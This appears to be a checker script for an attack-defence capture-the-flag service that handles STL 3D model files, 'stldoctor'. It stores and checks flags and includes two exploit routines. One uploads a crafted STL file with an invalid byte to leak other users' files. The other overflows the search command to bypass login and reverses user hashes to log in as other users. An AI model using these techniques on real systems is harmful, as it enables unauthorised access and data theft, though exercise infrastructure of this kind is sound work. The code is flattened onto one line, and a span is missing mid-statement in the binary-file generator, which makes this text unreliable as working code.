#!/usr/bin/env python3 from enochecker import BaseChecker, BrokenServiceException, EnoException, run from enochecker.utils import SimpleSocket, assert_equals, assert_in import os, random, string, struct, subprocess, logging, selectors, time, socket import numpy as np logging.getLogger("faker").setLevel(logging.WARNING) logging.getLogger("pwnlib").setLevel(logging.WARNING) logging.getLogger("_curses").setLevel(logging.CRITICAL) from faker import Faker evil_file = b""" solid test\xff facet normal 0 0 1.0 outer loop vertex 1 0 0 vertex 1 1 0 vertex 0 1 0 endloop endfacet endsolid """ def ensure_bytes(v): if type(v) == bytes: return v elif type(v) == str: return v.encode() else: raise BrokenServiceException("Tried to pass non str/bytes to bytes arg") class STLDoctorChecker(BaseChecker): service_name = "stldoctor" port = 9090 flag_variants = 2 noise_variants = 2 havoc_variants = 4 exploit_variants = 2 prompt = b"$ " def login_user(self, conn, password): self.debug("Sending command to login.") conn.write(f"login\n{password}\n") conn.readline_expect(b"logged in!", recvuntil=self.prompt, exception_message="Failed to log in") def write(self, conn, buf): self.debug("SEND: " + str(ensure_bytes(buf))) conn.send(ensure_bytes(buf)) def fakeid(self): fake = Faker(["en_US"]) allowed = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmopqrstuvwxyz0123456789-+.!" idstr = "".join([c for c in fake.name().replace(' ','') if c in allowed][:60]).ljust(10, '.') idstr += "".join([random.choice(allowed) for i in range(5)]) return idstr def havocid(self): idlen = random.randint(10, 60) return "".join([chr(random.randint(32, 127)) for i in range(idlen)]) def do_auth(self, conn, authstr): conn.write(f"auth {authstr}\n") resp = conn.recvuntil(self.prompt) authstr = ensure_bytes(authstr) assert_in(b"Success!", resp, f"Login with pass {authstr} failed"); def check_listed(self, conn, modelid): modelid = ensure_bytes(modelid) conn.write("list\n") resp = conn.recvuntil(self.prompt) assert_in(modelid, resp, f"Uploaded model is missing from list command") def genfile_ascii(self, solidname): solidname = ensure_bytes(solidname) if len(solidname) != 0: content = b"solid " + solidname + b"\n" else: content = b"solid\n" facet_count = random.randint(4, 30) for fi in range(facet_count): content += b"facet normal " vs = [[random.random() for i in range(3)] for k in range(3)] norm = np.cross(np.subtract(vs[1], vs[0]), np.subtract(vs[2],vs[0])) norm = norm / np.linalg.norm(norm) content += " ".join([f"{v:.2f}" for v in norm]).encode() + b"\n" content += b"outer loop\n" for i in range(3): content += b"vertex " + " ".join([f"{v:.2f}" for v in vs[i]]).encode() + b"\n" content += b"endloop\n" content += b"endfacet\n" if solidname != b"": content += b"endsolid " + solidname + b"\n" else: content += b"endsolid\n" return content def genfile_bin(self, solidname): solidname = ensure_bytes(solidname) if len(solidname) > 78: raise EnoException("Solidname to embed in header is larger than header itself") if solidname != "": content = b"#" + solidname.ljust(78, b"\x00") + b"\x00" else: content = b"#" + b"\x00" * 79 facet_count = random.randint(4, 30) content += struct.pack(" None if self.variant_id == 0: conn = self.openconn() modelname = self.fakeid() stlfile, modelid = self.putfile(conn, modelname, self.flag, filetype = "ascii") self.closeconn(conn) self.postdb({ "modelid": modelid, "modelname": modelname }) elif self.variant_id == 1: conn = self.openconn() modelname = self.fakeid() authstr = self.fakeid() self.do_auth(conn, authstr) stlfile, modelid = self.putfile(conn, modelname, self.flag, filetype = "bin") self.closeconn(conn) self.postdb({ "modelid": modelid, "modelname": modelname, "auth": authstr }) else: raise EnoException("Invalid variant_id provided") def getflag(self): # type: () -> None if self.variant_id == 0: modelid, modelname = self.querydb("modelid", "modelname") conn = self.openconn() resp = self.getfile(conn, modelname.encode()) self.debug(resp) assert_in(self.flag.encode(), resp, "Resulting flag was found to be incorrect") self.closeconn(conn) elif self.variant_id == 1: modelid, modelname, authstr = self.querydb("modelid", "modelname", "auth") conn = self.openconn() self.do_auth(conn, authstr) resp = self.getfile(conn, modelname.encode()) assert_in(self.flag.encode(), resp, "Resulting flag was found to be incorrect") self.closeconn(conn) else: raise EnoException("Invalid variant_id provided") def putnoise(self): # type: () -> None if self.variant_id == 0: conn = self.openconn() modelname = self.fakeid() solidname = self.fakeid() contents, modelid = self.putfile(conn, modelname, solidname, "bin") self.closeconn(conn) self.postdb({ "modelid": modelid, "modelname": modelname, "solidname": solidname, "contents": contents }) elif self.variant_id == 1: conn = self.openconn() authstr = self.fakeid() modelname = self.fakeid() solidname = self.fakeid() self.do_auth(conn, authstr) contents, modelid = self.putfile(conn, modelname, solidname, "ascii") self.closeconn(conn) self.postdb({ "modelid": modelid, "modelname": modelname, "solidname": solidname, "contents": contents, "auth": authstr }) else: raise EnoException("Invalid variant_id provided") def getnoise(self): # type: () -> None if self.variant_id == 0: modelid, modelname, solidname, contents = self.querydb("modelid", "modelname", "solidname", "contents") conn = self.openconn() self.check_getfile(conn, modelname, solidname, contents, modelid) self.closeconn(conn) elif self.variant_id == 1: modelid, modelname, solidname, contents, authstr = self.querydb("modelid", "modelname", "solidname", "contents", "auth") conn = self.openconn() self.do_auth(conn, authstr) self.check_getfile(conn, modelname, solidname, contents, modelid) self.closeconn(conn) else: raise EnoException("Invalid variant_id provided") def havoc(self): # type: () -> None if self.variant_id == 0: self.havoc_upload('ascii', False) elif self.variant_id == 1: self.havoc_upload('bin', False) elif self.variant_id == 2: self.havoc_upload('ascii', True) elif self.variant_id == 3: self.havoc_upload('bin', True) else: raise EnoException("Invalid variant_id provided"); def exploit(self): # type: () -> None if self.variant_id == 0: name = self.fakeid() conn = self.openconn() resp,mid = self.putfile(conn, name, name, stlfile=evil_file) self.debug(f"Evil file: {mid}") self.closeconn(conn) conn = self.openconn() resp = self.getfile(conn, name, download=False) self.debug(str(resp)) conn.write("search last\n") filelist = [l.strip().split(b" : ") for l in conn.recvuntil("?").split(b"\n") if b" : " in l] found = None for i in range(len(filelist)): self.debug(b"Retrieving file " + filelist[i][0] + b": " + filelist[i][1]) conn.write(filelist[i][0] + b"\ny\n") fileinfo = conn.recvuntil(self.prompt) self.debug("File contents:\n" + fileinfo.decode("latin1")) found = self.search_flag_bytes(fileinfo) if found is not None or i == len(filelist) - 1: break self.getfile(conn, name, download=False) conn.write("search last\n") conn.recvuntil("?") self.closeconn(conn) if found is None: raise BrokenServiceException("Exploit for flagstore 1 failed") return found elif self.variant_id == 1: conn = self.openconn() conn.write(b"search \xff\xff\xff\xff\xff0000000000000000\n") conn.recvuntil(self.prompt) conn.write("auth\n") assert_in(b"Already logged in!", conn.recvuntil(self.prompt), "Exploit did not set 'loggedin' variable via overflow") conn.write("list\n") resp = conn.recvuntil(self.prompt) self.debug(resp) users = [l.split(b" .")[1] for l in resp.split(b"\n") if b">> ." in l] self.closeconn(conn) conn = self.openconn() found = None for u in users: self.debug(f"Logging in as user with id {u}") user = self.reverse_hash(u.decode()) if user == b"": raise BrokenServiceException("Failed to find hash preimage") self.debug(f"Hash preimage: {user}") conn.write(b"auth " + user + b"\n") resp = conn.recvuntil(self.prompt) self.debug(resp) if b"Welcome back" not in resp: raise BrokenServiceException("Revhash returned invalid preimage") conn.write("list\n") resp = conn.recvuntil(self.prompt) self.debug(resp) names = b"\n".join([l.split(b": ", 1)[1] for l in resp.split(b"\n") if b"Solid Name: " in l]) found = self.search_flag_bytes(names) if found is not None: break self.closeconn(conn) if found is None: raise BrokenServiceException("Exploit for flagstore 2 failed") return found else: raise EnoException("Invalid variant_id provided") app = STLDoctorChecker.service # This can be used for uswgi. if __name__ == "__main__": run(STLDoctorChecker)